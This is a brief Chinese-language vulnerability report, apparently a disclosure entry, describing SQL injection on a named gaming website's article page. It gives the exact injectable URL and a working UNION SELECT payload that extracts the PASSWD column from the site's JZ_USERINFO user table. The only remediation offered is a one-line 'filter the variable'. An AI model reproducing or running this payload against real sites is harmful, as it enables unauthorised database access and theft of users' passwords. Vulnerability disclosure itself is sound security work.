详细说明:
硅谷动力游戏站点,存在注入的URL为:
http:/games.enet.com.cn/zhuanti/zx/action/article_v.shtml?id=102929
用union联合查询找出此处有八个字段用null替换之可猜解出用户账号密码,由此导致用户敏感信息泄露。

漏洞证明:
?id=102929%20and%201=2%20union%20all%20select%20null,chr%2894%29||chr%2894%29||chr%2894%29||chr%2894%29||chr%2894%29||chr%2894%29||chr%2894%29||PASSWD,null,null,null,null,null,null%20from%20JZ_USERINFO

修复方案:
过滤变量。